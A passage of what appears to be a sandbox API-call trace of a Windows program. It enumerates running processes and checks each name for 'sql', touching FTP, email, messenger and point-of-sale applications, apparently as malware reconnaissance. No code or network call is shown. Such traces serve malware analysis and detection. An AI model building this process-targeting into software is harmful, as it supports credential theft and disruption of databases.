lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0176.710] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0176.710] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0176.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0176.711] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35869c0 [0176.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35869c0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0176.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0176.711] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0176.711] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0176.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.712] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3585258 [0176.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3585258, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0176.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0176.713] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0176.713] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0176.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.714] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585150 [0176.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3585150, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0176.714] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0176.714] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0176.714] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0176.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.715] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3585180 [0176.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3585180, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0176.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0176.715] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0176.715] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0176.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0176.716] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595748 [0176.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3595748, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0176.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0176.716] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0176.716] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0176.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.718] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595968 [0176.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3595968, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0176.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0176.718] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0176.718] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0176.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0176.719] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35869d0 [0176.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35869d0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0176.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0176.719] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0176.719] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0176.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.721] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585360 [0176.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3585360, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0176.721] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0176.721] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0176.721] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0176.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.722] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35851c8 [0176.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35851c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0176.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0176.723] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0176.723] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0176.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.724] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3585330 [0176.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3585330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0176.724] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0176.724] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0176.724] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0176.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.725] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3585210 [0176.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3585210, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0176.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0176.725] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0176.725] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0176.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.727] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35852a0 [0176.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x35852a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0176.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0176.727] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0176.727] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0176.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.728] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3585378 [0176.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3585378, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0176.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0176.728] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0176.728] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0176.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0176.730] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35851b0 [0176.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x35851b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0176.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0176.730] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0176.730] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0176.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.731] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35850f0 [0176.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35850f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0176.731] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0176.731] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0176.731] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0176.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.733] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585318 [0176.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3585318, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0176.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0176.733] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0176.733] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0176.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.734] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3585228 [0176.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3585228, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0176.734] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0176.734] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0176.734] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0176.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.736] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35852b8 [0176.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x35852b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0176.736] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0176.736] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0176.736] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0176.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0176.788] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35853d8 [0176.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35853d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0176.788] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0176.788] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0176.788] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0176.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.790] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3585240 [0176.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3585240, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0176.790] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0176.790] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0176.790] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0176.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0176.791] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35959c8 [0176.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35959c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0176.791] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0176.791] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0176.791] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0176.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0176.792] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35957c8 [0176.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35957c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0176.792] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0176.792] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0176.793] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0176.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.794] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35851e0 [0176.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35851e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0176.794] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0176.794] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0176.794] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | 